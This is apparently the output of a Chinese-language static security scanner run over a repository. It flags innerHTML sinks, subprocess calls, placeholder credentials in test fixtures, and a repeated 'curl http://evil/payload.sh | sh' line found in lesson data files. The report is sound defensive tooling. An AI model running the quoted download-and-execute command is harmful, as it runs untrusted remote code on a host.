严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
148curl http://evil/payload.sh | sh
规则备注 · 出现在数据文件中,可能是文本样本而非执行路径
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
148curl http://evil/payload.sh | sh
规则备注 · 出现在数据文件中,可能是文本样本而非执行路径
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
docs/data/lessons.json:148GitHub 148curl http://evil/payload.sh | sh
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
docs/data/lessons.json:148GitHub 148curl http://evil/payload.sh | sh
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
2311.innerHTML =
规则备注 · 附近存在清洗/转义调用;位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
2354.innerHTML =
规则备注 · 附近存在清洗/转义调用;位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-002从第三方地址加载浏览器脚本
置信度 低L2 · 静态分析
15<script src="https://cdnjs.cloudflare.com/ajax/libs/dompurify/3.0.9/purify.min.js
规则备注 · 来自公共 CDN cdnjs.cloudflare.com,未固定完整性哈希;位于测试、示例或文档目录
修复建议随插件固定分发依赖,或使用带 integrity 校验的可信来源。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
docs/insights/lesson-coverage.html:134GitHub 134.innerHTML =
规则备注 · 附近存在清洗/转义调用;位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
docs/insights/lesson-coverage.html:144GitHub 144.innerHTML =
规则备注 · 附近存在清洗/转义调用;位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
docs/insights/pr-genius.html:227GitHub 227.innerHTML =
规则备注 · 附近存在清洗/转义调用;位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
docs/insights/reputation-leaderboard.html:114GitHub 114.innerHTML =
规则备注 · 附近存在清洗/转义调用;位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
docs/insights/unsolved-map.html:99GitHub 99.innerHTML =
规则备注 · 附近存在清洗/转义调用;位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
docs/insights/unsolved-map.html:124GitHub 124.innerHTML =
规则备注 · 附近存在清洗/转义调用;位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
docs/journey/index.html:289GitHub 289.innerHTML =
规则备注 · 位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
docs/journey/index.html:318GitHub 318.innerHTML =
规则备注 · 位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
docs/openclaw-pr/fatal-error-hooks-rawless.ts:12GitHub 12node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
docs/openclaw-pr/openclaw-fatal-hook-proof.mjs:8GitHub 8execSync
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
docs/openclaw-pr/openclaw-fatal-hook-proof.mjs:8GitHub 8node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
docs/search/danmaku-widget.html:52GitHub 52.innerHTML=
规则备注 · 位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
docs/search/index.html:469GitHub 469.innerHTML =
规则备注 · 位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
docs/search/index.html:515GitHub 515.innerHTML =
规则备注 · 附近存在清洗/转义调用;位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
packages/fatal-guard/tests/cli-contract.js:5GitHub 5spawnSync
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
packages/fatal-guard/tests/cli-contract.js:5GitHub 5node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
packages/fatal-guard/tests/crash-scenarios.js:16GitHub 16execSync
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
packages/fatal-guard/tests/crash-scenarios.js:16GitHub 16node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
packages/fatal-guard/tests/crash-scenarios.js:86GitHub 86ghp_abcdefghijklmnopqrstuvwxyz1234567890
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
packages/fatal-guard/tests/redact-compliance.js:6GitHub 6AKIA1234567890123456
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
packages/fatal-guard/tests/redact-compliance.js:7GitHub 7ghp_abcdefghijklmnopqrstuvwxyz1234567890
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
packages/fatal-guard/tests/smoke.test.js:5GitHub 5node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
packages/fatal-guard/tests/verify-fix.js:19GitHub 19node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
packages/fatal-guard/tests/windows-compat.test.js:5GitHub 5node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
tasks/lesson-github-actions-code-injection.json:12GitHub 12curl http://evil/payload.sh | sh
规则备注 · 出现在数据文件中,可能是文本样本而非执行路径
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
tests/fixtures/intake_spam_guard_corpus.json:74GitHub 74ghp_ABCdefGHIJklmnoPQRstuvWXYZ1234567890
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
tests/fixtures/intake_spam_guard_corpus.json:75GitHub 75sk-ant-api03-abcdefghijklmnopqrstuvwxyz1234567890
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
tests/frontend.test.js:45GitHub 45.innerHTML =
规则备注 · 位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
中HT-CLIENT-001浏览器端使用危险 HTML 注入点
置信度 低L2 · 静态分析
tests/frontend.test.js:92GitHub 92.innerHTML =
规则备注 · 附近存在清洗/转义调用;位于测试、示例或文档目录
修复建议使用安全 DOM API,并严格清洗不可信内容。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
tests/test_benchmark_fixtures.py:37GitHub 37subprocess.run
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
tests/test_benchmark_fixtures.py:49GitHub 49subprocess.run
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
tests/test_ci_self_heal.py:21GitHub 21subprocess.run
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
tests/test_ci_self_heal.py:81GitHub 81subprocess.run
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
tests/test_intake_redaction.py:40GitHub 40xoxb-1234567890-1234567890123-abc
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
tests/test_intake_redaction.py:57GitHub 57-----BEGIN RSA PRIVATE KEY-----
规则备注 · 位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
tests/test_intake_spam_guard.py:62GitHub 62subprocess.run
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
tests/test_intake_spam_guard.py:73GitHub 73subprocess.run
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
tests/test_intake_spam_guard.py:150GitHub 150ghp_1234567890abcdefghijklmnopqrstuvwxyz
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
tests/test_lesson_gate.py:207GitHub 207subprocess.run
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
tests/test_lesson_gate.py:216GitHub 216subprocess.run
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
tests/test_queue_lesson_dry_run.py:15GitHub 15subprocess.run
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
tests/test_tombstone_redaction.py:16GitHub 16ghp_abcdefghijklmnopqrstuvwxyzABCDEFGHIJ
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
tests/test_unsolved_map.py:96GitHub 96subprocess.run
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。